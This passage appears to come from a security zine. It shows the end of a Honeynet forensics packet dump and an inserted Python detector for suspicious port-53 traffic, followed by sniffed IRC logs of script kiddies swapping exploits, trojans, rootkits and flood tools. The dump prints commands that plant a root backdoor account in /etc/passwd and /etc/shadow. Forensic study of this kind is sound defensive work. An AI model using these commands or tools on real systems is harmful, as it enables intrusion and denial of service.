      *****PA* Seq: 0x45D2CB   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043120 144023623 
      65 63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A  echo "twin::506: 
      35 30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A  506::/home/twin: 
      2F 62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65  /bin/bash" >> /e 
      74 63 2F 70 61 73 73 77 64 0A                    tc/passwd. 
      
      04/26-06:44:00.448249 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18892  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D305   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029033 4043120 
      
      04/26-06:44:00.562329 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26499  DF 
      *****PA* Seq: 0x45D305   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043134 144029033 
      65 63 68 6F 20 22 74 77 69 6E 3A 77 33 6E 54 32  echo "twin:w3nT2 
      48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A 22  H0b6AjM2:::::::" 
      20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0A   >> /etc/shadow. 
      0A                                               . 
      
      04/26-06:44:00.578252 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18893  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D336   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029046 4043134 
      
      04/26-06:44:03.647436 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26501  DF 
      *****PA* Seq: 0x45D336   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043443 144029046 
      0A                                               . 
      
      04/26-06:44:03.658554 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18894  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D337   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029354 4043443 
      
      04/26-06:44:04.699420 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26502  DF 
      *****PA* Seq: 0x45D337   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043548 144029354 
      65 63 68 6F 20 22 68 61 6E 74 75 3A 3A 30 3A 30  echo "hantu::0:0 
      3A 3A 2F 3A 2F 62 69 6E 2F 62 61 73 68 22 20 3E  ::/:/bin/bash" > 
      3E 20 2F 65 74 63 2F 70 61 73 73 77 64 0A        > /etc/passwd. 
      
      04/26-06:44:04.718625 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18895  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D365   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029460 4043548 
      
      04/26-06:44:04.829064 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26504  DF 
      *****PA* Seq: 0x45D365   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4043561 144029460 
      65 63 68 6F 20 22 68 61 6E 74 75 3A 77 33 6E 54  echo "hantu:w3nT 
      32 48 30 62 36 41 6A 4D 32 3A 3A 3A 3A 3A 3A 3A  2H0b6AjM2::::::: 
      22 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77  " >> /etc/shadow 
      0A 0A 0A 
      
      04/26-06:44:04.848620 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18896  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D398   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144029473 4043561 
      
      04/26-06:46:21.055744 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26540  DF 
      ***F**A* Seq: 0x45D398   Ack: 0x3FA0791C   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4057184 144029473 
      
      04/26-06:46:21.055951 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18974  DF 
      ******A* Seq: 0x3FA0791C   Ack: 0x45D399   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144043092 4057184 
      
      04/26-06:46:21.056696 172.16.1.107:53 -> 63.226.81.13:1351 
      TCP TTL:64 TOS:0x0 ID:18975  DF 
      ***F**A* Seq: 0x3FA0791C   Ack: 0x45D399   Win: 0x7C70 
      TCP Options => NOP NOP TS: 144043092 4057184 
      
      04/26-06:46:21.167231 63.226.81.13:1351 -> 172.16.1.107:53 
      TCP TTL:50 TOS:0x0 ID:26542  DF 
      ******A* Seq: 0x45D399   Ack: 0x3FA0791D   Win: 0x7D78 
      TCP Options => NOP NOP TS: 4057196 144043092 
        
      
      Exiting... 
        
      
      =============================================================================== 
      Snort processed 59 packets. 
      Breakdown by protocol: 
          TCP: 33         (55.932%) 
          UDP: 26         (44.068%) 
         ICMP: 0          (0.000%) 
          ARP: 0          (0.000%) 
         IPv6: 0          (0.000%) 
          IPX: 0          (0.000%) 
        OTHER: 0          (0.000%) 
        
      
      =============================================================================== 
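
      The indicators pointed out in the two comments above (the NOP sled and '/bin/sh' inside a
      TCP "DNS" payload, then plain-text shell commands on the same port 53 session) can be checked
      mechanically. The following is an added example, not part of the original paper or of Snort:
      a Python parser for this dump layout. The function names, the marker list and both thresholds
      are assumptions; the sample is a shortened excerpt of the trace above.

```python
import re
from dataclasses import dataclass, field

# Shortened excerpt of the trace above: the overflow packet is cut down to two
# NOP rows plus the row holding "/bin/sh"; the other two packets are complete.
SAMPLE = """\
04/26-06:43:05.244101 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26475  DF
*****PA* Seq: 0x45B8EA   Ack: 0x3FA07874   Win: 0x7D78
TCP Options => NOP NOP TS: 4037599 144023498
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
4F FE FF FF 2F 62 69 6E 2F 73 68 00 2D 63 00 FF  O.../bin/sh.-c..

04/26-06:43:09.880779 213.28.22.189:1045 -> 172.16.1.107:53
UDP TTL:40 TOS:0x0 ID:18907
Len: 40
95 6B 01 00 00 01 00 00 00 00 00 00 01 72 08 72  .k...........r.r
73 61 76 69 6E 67 73 03 6E 65 74 00 00 01 00 01  savings.net.....

04/26-06:44:00.432457 63.226.81.13:1351 -> 172.16.1.107:53
TCP TTL:50 TOS:0x0 ID:26498  DF
*****PA* Seq: 0x45D2CB   Ack: 0x3FA0791C   Win: 0x7D78
TCP Options => NOP NOP TS: 4043120 144023623
65 63 68 6F 20 22 74 77 69 6E 3A 3A 35 30 36 3A  echo "twin::506:
35 30 36 3A 3A 2F 68 6F 6D 65 2F 74 77 69 6E 3A  506::/home/twin:
2F 62 69 6E 2F 62 61 73 68 22 20 3E 3E 20 2F 65  /bin/bash" >> /e
74 63 2F 70 61 73 73 77 64 0A                    tc/passwd.
"""

HEADER = re.compile(r"(\d\d/\d\d-[\d:.]+) ([\d.]+):(\d+) -> ([\d.]+):(\d+)")
# Matches only the hex column: the run of "XX " tokens ends at the wider gap
# that separates it from the ASCII column.
HEX_ROW = re.compile(r"(?:[0-9A-F]{2} )+")
# Assumed marker list, taken from strings visible in the trace.
MARKERS = (b"/bin/sh", b"/etc/passwd", b"/etc/shadow", b"uid=0(root)")


@dataclass
class Packet:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = ""
    payload: bytearray = field(default_factory=bytearray)


def parse_dump(text):
    """Rebuild each packet's payload bytes from the hex column of the dump."""
    packets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            cur = Packet(m[1], m[2], int(m[3]), m[4], int(m[5]))
            packets.append(cur)
        elif cur is not None and line.startswith(("TCP TTL", "UDP TTL")):
            cur.proto = line[:3]
        elif cur is not None and cur.proto:
            row = HEX_ROW.match(line + " ")  # pad so a row without ASCII column still matches
            if row:
                cur.payload += bytes.fromhex(row[0])
    return packets


def longest_run(data, value=0x90):
    """Length of the longest run of one byte value (0x90 = x86 NOP)."""
    best = run = 0
    for b in data:
        run = run + 1 if b == value else 0
        best = max(best, run)
    return best


def findings(pkt, nop_threshold=16, text_ratio=0.95):
    """Reasons a port 53 packet does not look like DNS (heuristics, not proof)."""
    if 53 not in (pkt.sport, pkt.dport) or not pkt.payload:
        return []
    hits = []
    run = longest_run(pkt.payload)
    if run >= nop_threshold:
        hits.append(f"nop-sled:{run}")
    hits += ["string:" + m.decode() for m in MARKERS if m in pkt.payload]
    # DNS messages carry binary headers; a TCP/53 payload that is almost all
    # printable text is an interactive session, not a zone transfer or query.
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in pkt.payload)
    if (pkt.proto == "TCP" and len(pkt.payload) >= 8
            and printable / len(pkt.payload) >= text_ratio):
        hits.append("cleartext-on-dns-port")
    return hits


def scan(text):
    """Return (timestamp, source, findings) for every suspicious packet."""
    report = []
    for pkt in parse_dump(text):
        hits = findings(pkt)
        if hits:
            report.append((pkt.ts, f"{pkt.src}:{pkt.sport}", hits))
    return report


if __name__ == "__main__":
    for ts, src, hits in scan(SAMPLE):
        print(ts, src, ", ".join(hits))
```

      The ordinary UDP query in the sample produces no finding; only the two TCP packets from
      63.226.81.13 are reported.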
      
      EoF
      
      Additional analysis Know your enemy #3: Forensics
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      #
      # I will be posting other people's observations on
      # this page.  If you have anything you would like to
      # add, email Lance Spitzner <lance@spitzner.net>
      #
      
      Contributed by verin <knight@pctechnician.net>
      
      1. NUS = National University of Singapore. homepage is www.nus.edu.sg
      
      2. 137.132.216.35 = this looks like a home account given to students
      (unknown faculty)
      
      3. 137.132.17.202 = Looks like a laboratory computer, library computer,
      Lecturer's computer, Not a server. (could be a server, but it'd be an
      internal one and heavily firewalled.)
      
      4. [root@apollo /]# nslookup magix : Magix is an ADSL Internet Service
      Provided by Singtel (Singapore Telecommunications Ltd.). Attacker may
      have an account on it. Homepage is www.magix.com.sg
      
      5. [root@apollo /]# nslookup irc.powersurf.com : Most likely hangs
      around on that server.. probably in channels like #singapore or
      singapore, NUS related.
      
      EoF
      
      @HWA
      
      
      The script kids chat logs sniffed from compromised system : #4
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      (Sanitized)
      
      Day 01 - June 4
      
      :D1ck :hello J4n3 
      :J4n3 :hello D1ck 
      :J4n3 :i called u , u weren't there
      :J4n3 ::)
      :D1ck :oh 
      :D1ck :i just got back from dinner.
      :D1ck ::/
      :D1ck :sup sup?
      :J4n3 :heh
      :J4n3 :nothin much
      :J4n3 :yaar that ifup wasn't connecting
      :J4n3 :i did it throug kppp of kde
      :D1ck :oye
      :D1ck :i am making a elite archieve of sploits just for k1dd13 members
      :D1ck :can u make pass protection on sites?
      :J4n3 :D1ck u talkin to me ?
      :D1ck :yea
      :J4n3 :yeah i can make it password protected
      :J4n3 :cgi script
      :D1ck :ls ftp
      :D1ck :bd  bnc  botpack  clone  dos  exploit  kit  local  login  scan  sniff  spoof
      :D1ck :cool
      :D1ck :ok
      :D1ck :i have an account on www.example.com
      :J4n3 :hehe kewl
      :D1ck :when i boot i`ll give j00h the pass
      :D1ck :make sure it's leet i dont want any other person other then u me m4ry mi||er and glitchX to have access
      :D1ck ::P
      :D1ck :hehe
      :D1ck :all leet stuff
      :J4n3 :y0 hooo
      :J4n3 :ha ha
      :J4n3 :d0n worry boss
      :D1ck :hehehe
      :D1ck ::)
      :J4n3 :tight
      :J4n3 :kewl
      :J4n3 :zabardasth :p
      :D1ck :=P
      :D1ck :u have any stuff u wana get added?
      :J4n3 :not any thin speciall yaar wahi common sploits
      :J4n3 :but yeah
      :J4n3 :i'm gonna grab some from doc
      :J4n3 :then i'll ad them there
      :D1ck :?
      :D1ck :cool
      :D1ck :doc never gives :(
      :D1ck :or does he
      :D1ck :hehe
      :D1ck :ok
      :J4n3 :heeh yeah he does
      :J4n3 :he offered me , but maiany khud hee manga nahi kabi
      :J4n3 :just once i asked him for statd 
      :J4n3 :he gave me a linux version of it
      :D1ck :wow.c
      :D1ck :?
      :D1ck :wow.c is VERY VERY VERY VERY OLD
      :D1ck :wow.c is VERY VERY VERY VERY OLD
      :J4n3 :hhaah yeah
      :J4n3 :he gave me 2
      :J4n3 :wow and another 0-day production 
      :D1ck : Signon by h4r33
      :D1ck :OCENTER.SKYINET.NET at 10:08pm
      :D1ck :<OCENTER.SKYINET.NET at 10:08pm
      :J4n3 :ye INFOCENTER haath nahi aaya abee thak ?
      :D1ck :err
      :D1ck :<J4n3> wow and another 0-day production
      :D1ck :wow is not 0-day
      :D1ck :its old
      :D1ck :whats the other?
      :J4n3 :wait
      :D1ck :hehe
      :D1ck :nope yaar
      :J4n3 :[root@example portedfor]# ./statd-new
      :J4n3 :Legion 2000 Security Research 0-day Productions
      :J4n3 : New Modified statd remote exploit - ironlungs@wireco.net
      :J4n3 :sage: ./statd-new [host_name] [remote_cachename] [command]
      :D1ck :hmmmmm
      :D1ck :cool
      :D1ck :can u send me?
      :D1ck :0x9 098e 9x /
      :J4n3 :why not honey
      :J4n3 :;)
      :D1ck :k thanks
      :D1ck :<h4r33:#Linuxsex> who the fuck removed my xs again ?
      :D1ck :HAHAHAHA
      :J4n3 :hahahahha
      :D1ck :d4v3
      :D1ck : send me the .c
      :J4n3 :don have it
      :J4n3 :i got compiled one
      :D1ck :man it could be a trojan?
      :J4n3 :i got all these compiled
      :D1ck :they can direct shell code to localhost, 12.0.0.1
      :J4n3 :haha naaa
      :D1ck :not may good coders can read it.
      :J4n3 :its not 100 %
      :D1ck :heh well ok
      :J4n3 :meri guarantie
      :D1ck :send me the other 0-day
      :D1ck :kewl
      :D1ck :does it work
      :J4n3 :i got all these already compiled
      :D1ck :?
      :J4n3 :yyeah it does but mostly boxes r patched
      :J4n3 :[root@example portedfor]# ls
      :J4n3 :admmount  imapx   mountd      pcnfsd_remote  rotshb    statd-new
      :J4n3 :boot      listen  nameserver  ported_f.zip   smbmount  wow
      :J4n3 :dipx      lsx     nisd        robo           solbind
      :D1ck :heh ok
      :J4n3 :and yeah wait
      :J4n3 :[root@example 0-day]# ls
      :J4n3 :core  fbo.c  ob_accou.c  prout  rh6mountd.c  rpc-autofsd  sdi
      :D1ck :okies
      :D1ck :hahah kewl
      :D1ck :/dcc send me if u can/want :/
      :J4n3 :kon kon sa baijon ? all ?
      :D1ck :tar -zcvf 0-day.tar.gz 0-day
      :J4n3 :what the tar command lemme tar the 0-day folder
      :D1ck : /dcc send D1ck 0-day.tar.gz
      :D1ck :hehe
      :D1ck :<D1ck> tar -zcvf 0-day.tar.gz 0-day
      :D1ck :rr heh
      :J4n3 :oye
      :D1ck :yo
      :J4n3 :i downloaded a file from packetstorm
      :J4n3 :name was ALL-EXPLOITS-1999
      :D1ck :yep?
      :J4n3 :6 mb file
      :J4n3 :ALL-EXPLOITS-199.tar.gz
      :J4n3 :ALL-EXPLOITS-1999.tar.gz
      :J4n3 :too many sploits in them
      :J4n3 :it made 10 folders
      :J4n3 :evey folder contain different sploits
      :D1ck :ok and?
      :J4n3 :i mean to say u also download it, shayed kaam kee cheez niklay
      :D1ck :oh accha
      :D1ck :give me the url
      :D1ck :yaar most exploits are dummy's or trojans remember
      :D1ck :or they have bugs
      :D1ck :only a few worl
      :D1ck :only a few worl
      :J4n3 :packetstorm.securify.com  look in main page at top 20 recent files
      :D1ck :errr
      :J4n3 :yeah i know
      :D1ck :send me i`ll put important ones in there
      :D1ck :okies 
      :D1ck :suspicious code
      :D1ck :rhmountd.c
      :D1ck :checkign
      :J4n3 :kkz
      :D1ck :did they compile?
      :D1ck :ah
      :D1ck :IRIX
      :J4n3 :that account.c ?
      :D1ck :yep
      :J4n3 :yeah i heard its a great program
      :J4n3 :it remotely add login and pass on IRIX system
      :D1ck :hmmmm
      :D1ck :i think its locally
      :J4n3 :   SGI objectserver "account" exploit                                 */
      :J4n3 :   Remotely adds account to the IRIX system.                          */
      :J4n3 :   Tested on IRIX 5.2, 5.3, 6.0.1, 6.1 and even 6.2,    
      :D1ck :kewl kewl
      :D1ck :Oh this is the 0-day
      :D1ck :Oh this is the 0-day
      :J4n3 :yeah
      :D1ck :leet
      :D1ck :does it compile?
      :J4n3 ::p
      :J4n3 :on irix i think
      :D1ck :haha ok
      :D1ck :# uname -a;
      :D1ck :id
      :D1ck :IRIX delta 5.3 11091811 IP19 mips
      :D1ck :# uid=0(root) gid=0(sys)
      :D1ck :#
      :D1ck :HAHAHAHAH
      :D1ck :don't get exited, i`m joking :/
      :D1ck :hehe
      :J4n3 :hahahah
      :J4n3 :COOOOL
      :J4n3 :it works haaan
      :J4n3 :where did u compile it ? on IRIX system ?
      :D1ck :hehehhe
      :D1ck :i am kidding 
      :D1ck :oe
      :D1ck :oye
      :D1ck ::)
      :J4n3 :lol
      :J4n3 :yeah ?
      :J4n3 :des|re .join #tr1be grepbitch
      :D1ck :oye
      :D1ck :send yure brother
      :J4n3 :yeah
      :D1ck :the url
      :D1ck :to that 6mb exploit file
      :D1ck :heh
      :J4n3 :my brother ?
      :D1ck :me
      :D1ck ::)
      :D1ck :<J4n3> my brother ?
      :D1ck :<D1ck> me
      :J4n3 :hahaha
      :J4n3 :sure sure
      :D1ck ::)
      :D1ck :LOL
      :J4n3 :hehe
      :D1ck :J4n3 
      :D1ck :give me some machine
      :D1ck :i`ll sploit it
      :D1ck :irix
      :D1ck :this way bots remember.
      
      -=-
      
      Day 02 - June 5
      
      :D1ck :miller
      :D1ck :;)
      :b0b :commerce?
      :b0b :lame nick ;-)
      :D1ck :?
      :b0b :d1ckey
      :D1ck :heh
      :D1ck :welp
      :D1ck :one bot from one box
      :D1ck :we dont have nicks
      :D1ck :so we name it from the ops
      :D1ck :hehe
      :D1ck :ips
      :D1ck : commerce (~werd@commerce.example.COM) (I
      :b0b :lol
      :b0b :ath0 my phriend 
      :D1ck :so what's up b0b 
      :D1ck ::/
      :D1ck :commerce nick ath0
      :D1ck :i coded ath0.c
      :b0b :kewl
      :D1ck :there was no need
      :D1ck :but
      :D1ck :i was boed
      :D1ck :accept my stuff
      :b0b :cut/paste?
      :D1ck :nope
      :D1ck :coded my self
      :D1ck :m4ry coded a elite port 80 httpd 0-day trojan
      :D1ck :he is mad elite in C
      :b0b :i know.. i was asking you to cut/paste the relevany code :-)
      :D1ck :heh
      :D1ck :bd.tar.gz is a backdoor for bindshell, i made that too
      :D1ck ::)
      :b0b :uff trunciated
      :b0b :kewl
      :D1ck :don't distro vortex3.c, its not mine :/
      :D1ck :hehe
      :D1ck :<b0b> uff trunciated
      :D1ck :i dint understand what that word means :/
      :D1ck :be EASY ON ENGALISH WITH ME #@#$@#$@#%$#@
      :D1ck ::)
      :b0b :what's vor-ticks-3?
      :b0b :hehe
      :b0b :chud gai thee
      :b0b :carriage returns
      :D1ck :A TROJAN
      :D1ck :on receiving a string
      :D1ck :on port 80
      :D1ck :it opens a bind shell
      :D1ck :like on a string'asad'
      :D1ck :it opens port 234323,
      :D1ck :or some thing
      :D1ck :hehehe
      :D1ck :LOL
      :b0b :bhai jaan..
      :b0b :if it is i c.. do some ereet shiats like subnet pining with ath0 etc.
      :D1ck :y0h f0h b4r
      :b0b :would be a whole lot faster than a bash scrwipt
      :b0b :me and angie already did the subnet ping shiats tc.
      :b0b :but C would rawk
      :b0b :0wn even
      :D1ck :yep
      :D1ck :i`ll do it
      :b0b :kewl
      :D1ck :but 
      :D1ck :shell script is a better idea.
      :D1ck :or i1ll have to write codes for gethostname()
      :b0b :and make it fork to background eggdrop ishtyle :-)
      :b0b :and loop
      :D1ck :abd work on errors
      :D1ck :hehe
      :D1ck :yep
      :b0b :so if we wanna fux0r one isp.. all we do is ./fuck
      :b0b :so if we wanna fux0r one isp.. all we do is ./fuck <subnet>
      :D1ck : DCC Auto-closing idle dcc SEND to b0b
      :D1ck :bind,sock.
      :D1ck :ah
      :D1ck :yep
      :b0b :do the gethostbyname() shiats foo
      :b0b :or what good are ur m4d C skillz?
      :b0b :send again
      :b0b :btw, i'm going to be learning C soon too inshallah
      :b0b :the we'll have C fights
      :b0b :yipeeee
      :b0b :i'll insult you in code
      :b0b :kekekeke
      :D1ck :i`ll do it ;)
      :D1ck :i made this ftp site i`ll upload it 
      :D1ck :just for k1dd13, all private stuff
      :D1ck :ls /root/ftp
      :D1ck :bd   botpack  dos      hack-irc-session  local  scan   spoof
      :D1ck :bnc  clone    exploit  kit               login  sniff
      :D1ck :oki
      :D1ck :i`ll do 
      :D1ck :hahahaha
      :b0b :and once we develop m4d C skillz.. we'll develop D
      :D1ck :kekekeke
      :b0b :the ultimate in URDU coding
      :b0b :eeeeeeeeeeeekekekekekekekekekeke
      :b0b :grep == dhoond
      :b0b :no no
      :b0b :find == dhoond
      :b0b :locate == madarcho-dhond
      :m4ry :MILLER@&*(#^*(@%^#*(&@
      :b0b :export == duramad
      :b0b :m4ry 
      :b0b :i was just doing some concept shiats for D
      :b0b :the ultimate in URDU coding
      :b0b :the base for urdunix
      :m4ry :HAHAHAHAHAHAHAHAHAHAHAH
      :b0b :export == duramad
      :b0b :find == dhoond
      :b0b :locate == madarchod-dhoond
      :b0b :exit == lun
      :b0b :BitchX == kutti
      :b0b :eehee
      :b0b :first.. lets develop BitchX in URDU
      :b0b :KuttiX
      :m4ry :l33t
      :m4ry :run == bhago
      :m4ry :LOL
      :m4ry :HAHAHAHA
      :m4ry :KuttiX.. LOL
      :b0b :eehee
      :b0b :./kick == /thudda
      :m4ry :D1ck
      :D1ck :miller
      :D1ck :u there?
      :D1ck :i got d/c
      :b0b :./op ==/ooperbitha
      :D1ck :some one is dosing me :)
      :b0b :no.. it's my friend bubloo
      :b0b :OF COURSE I'M HERE DAMMIT 
      :D1ck :m4ry 
      :D1ck :m4ry 
      :b0b :btw guys...
      :D1ck :y0h
      :b0b :guess how many hosts i have in my bclist?
      :D1ck :b0b  how many?
      :D1ck :udp flood > *
      :m4ry :.yo yo
      :m4ry :b0b: 28
      :m4ry :b0b: 5
      :D1ck :it literally rapes bandwith.
      :m4ry :how close ami?
      :m4ry :# telnet napster.com 80
      :m4ry :Trying 208.184.216.230...
      :m4ry :Connected to napster.com.
      :m4ry :Escape character is '^]'.
      :m4ry :HEAD / HTTP/1.1
      :m4ry :SYN FLOOD > *
      :b0b :phuck yew
      :D1ck :heh m4ry
      :b0b :2066 bloody 
      :m4ry :b0b: how many?
      :b0b :the scan is reaheaheaheahly slow
      :m4ry :HAHAHAHA
      :m4ry :aww
      :m4ry :ur not l33t :P~
      :m4ry :l33t hax0rs have 3 bcasts
      :m4ry :which return thouussannndsss of pings
      :m4ry :(in my dreams)
      :m4ry :hehe
      :b0b :ehehehehe
      :b0b :this is one BIG ass bc
      :b0b :who wants a taste?
      :b0b :just 100 pings?
      :D1ck :HAHAHAHAH
      :D1ck :syn  0wns y3w niggah
      :D1ck ::
      :D1ck :HAHAHAHAHAHA
      :D1ck :g|ngah
      :D1ck :b0b: take broadscan by pshysoid
      :D1ck :NOT ME
      :D1ck :
      :D1ck ::)
      :D1ck :me and J4n3 and m4ry have TONS TONS TONS bandwith :/
      :D1ck :we use it on h4r33 
      :D1ck :heh
      :D1ck :h4r33 is ultra lame
      :D1ck :
      :b0b :lol
      :D1ck :not worth a thought
      :D1ck ::)
      :D1ck :hehe
      :D1ck :cricket match is funny
      :b0b :damn
      :b0b :gotta jet
      :b0b :later all
      :b0b :fuck cricket
      :b0b :winuke their arses
      :b0b :laters
      :D1ck :heh
      :D1ck :<b0b> damn
      :__m4ry :someone traceroute 192.168.4.191 UDP port 53
      :__m4ry :aww
      :__m4ry :he ran away again
      :__m4ry :__m4ry is viper@192.168.252.32 * 3r33t hackers don't read mIRC.doc
      :__m4ry :HEHE
      :D1ck :<b0b> gotta jet
      :D1ck :<b0b> later all
      :D1ck :<b0b> fuck cricket
      :D1ck :<b0b> winuke their arses
      :D1ck : SignOff b0b: 
      :D1ck :          ])
      :D1ck :he's gone for another 4 months 
      :D1ck :HEHE
      :D1ck :hhahaha
      :D1ck :;)
      :D1ck :m4ry
      :D1ck :help me
      :D1ck :sysop:(
      :HeatAz :yeah
      :HeatAz : :
      :HeatAz ::/
      :D1ck :hehehe
      :m4ry :helping
      :m4ry :sup?
      :D1ck :hahaha
      :m4ry :LOL
      :D1ck :well
      :D1ck :cat world | grep -v sysop > hell
      :D1ck :PLEASE
      :D1ck :;)
      :D1ck ::(
      :m4ry :lol
      :m4ry :egrep sysop /dev/world > /dev/hell
      :D1ck :heh
      :D1ck :m4ry
      :D1ck :i`m making a mad elite
      :D1ck :ftp site
      :m4ry :D1ck..
      :m4ry :could u please traceroute 192.168.4.191 -p 53
      :m4ry :?
      :D1ck :just for amoung us
      :D1ck :its got every thing
      :D1ck :# ls
      :D1ck :bd   botpack  dos      hack-irc-session  local  scan   spoof
      :D1ck :bnc  clone    exploit  kit               login  sniff
      :D1ck :k
      :D1ck :traceroute to 192.168..4.191 (192.168.4.191), 30 hops max, 38 byte packets
      :D1ck : 1  192.168.232.254 (192.168.232.254)  148.127 ms  151.760 ms  160.238 ms
      :D1ck : 2  192.168.232.3 (192.168.232.3)  154.337 ms  138.676 ms  139.853 ms
      :D1ck : 3  192.168.244.30 (192.168.244.30)  226.507 ms  225.720 ms
      :D1ck : 3  192.168.244.30 (192.168.244.30)  226.507 ms  225.720 ms *
      :D1ck : 4  192.168.129.13 (192.168.129.13)  1170.320 ms  1041.645 ms  1221.868 ms
      :D1ck :m4ry
      :D1ck :u have any thing elite to contribute there?
      :D1ck :[Sysop_(~sys@example.com)] hey
      :D1ck :YOH HA NA
      :D1ck :ROXZ
      :D1ck :HE JUST HIT A SIX
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :b0b :brb, reading mail etc.
      :b0b :ACTION is idle, mail shail [bX(l/on p/on)]
      :D1ck :J4n3 
      :J4n3 :hmmm
      :J4n3 :oye miller was here ?
      :D1ck :0 J4n3 
      :D1ck :y0 J4n3 
      :D1ck :yep
      :D1ck :millah was here.
      :D1ck ::)
      :J4n3 :ohhh
      :J4n3 :missed him
      :J4n3 ::(
      :J4n3 :D1ck gime a elitee rootkit for linux
      :D1ck :hehe
      :J4n3 :same like sparc if u have
      :D1ck :h3h
      :D1ck :oki d0kies
      :D1ck :i will have to ftp, i`ll send u at night ok?
      :J4n3 :hmm okies, i'm gonna sploit linux boxes of edu
      :D1ck :oki dokies
      :D1ck :brb booting
      :D1ck :to win
      :D1ck :g0ne
      :J4n3 :kkz
      :m4ry :D1ck
      :m4ry :you there?
      :Sp07 :
      :D1ck :hi
      :D1ck :i`m gonna be posting k1dd13's site
      :D1ck :soon
      :D1ck ::)
      :D1ck :J4n3
      :D1ck :miller send me that web.tar.gz
      :D1ck :;)
      :Sp07 :oh
      :D1ck :i want some one with good writing skillz
      :D1ck ::/
      :D1ck :to write About, FAQ
      :D1ck :etc
      :D1ck ::)
      :D1ck :Sp07
      :D1ck :hmm
      :D1ck :PLAYING GAMEs?
      :Sp07 :nope
      :Sp07 :going to ergister a chanenl
      :Sp07 :sdgf
      :D1ck :hHAHAHAHAH
      :D1ck :ok
      :Sp07 :
      :Sp07 :I should make a game.tcl
      :Sp07 :thingy
      :Sp07 :majigger
      :D1ck :haha
      :Sp07 :somthinge
      :Sp07 :cool
      :Sp07 :how about portscan tcl
      :Sp07 :I want to make something new
      :D1ck :tell me
      :D1ck :is this para write for About
      :D1ck :?
      :D1ck :K1dd13 came into existance almost a year ago. It was born out of hate and contempt for violence, atrocities and human rights violations against Muslims, specially the affectees in Kashmir. It was precipitated to bring the attention of world leaders and
      :Sp07 :?
      :D1ck :organizations to the issue in cyberspace which is today the leading source of communication.
      :D1ck :is that fair enuff?
      :Sp07 :eyah I guess
      :Sp07 :I thought it was like a hacking group
      :Sp07 :hehe
      :Sp07 :not some terrorist group
      :D1ck :what should i add.
      :D1ck :?
      :D1ck :it is a hacking
      :D1ck :group
      :D1ck :but
      :D1ck :hahahahaa
      :D1ck :man u dont know kashmir
      :D1ck :if u see the pictures
      :D1ck :anyway
      :D1ck :what else should i add.
      :D1ck :?
      :Sp07 :add some pornh
      :D1ck :hha
      :Sp07 :what is lahore ?
      :D1ck :lahore==city
      :D1ck :Sp07 give me a good quote
      :Sp07 :I thought it was the whore in french
      :Sp07 :ill go get a quote fo you
      :D1ck :heh
      :D1ck :ok
      :Sp07 :I dont know any in my ehad
      :Sp07 :hea
      :Sp07 :d
      :Sp07 :Silence is gold, if nothing better you hold.
      :Sp07 :tahts gay
      :Sp07 :I heard a quote before
      :Sp07 :goes something like "If you want peace, you must prepare for war"
      :Sp07 :I herad it in a simpsons episode
      :Sp07 :name = Stone Cold
      :Sp07 :e-mail = **
      :Sp07 :homepage = **
      :Sp07 :town = ??
      :Sp07 :country = ??
      :Sp07 :Quote = Don't bring a knife to a gun fight 
      :Sp07 :hahahaa
      :Sp07 :"Never flush the toilet while taking a shower."
      :Sp07 :how about Famous Last Words
      :Sp07 :-- Abraham Lincoln 
      :Sp07 :          A house divided against itself cannot stand.
      :Sp07 :          The Bible is not my book, and Christianity is not my religion. I could never give assent to the long,
      :Sp07 :          complicated statements of Christian dogma. 
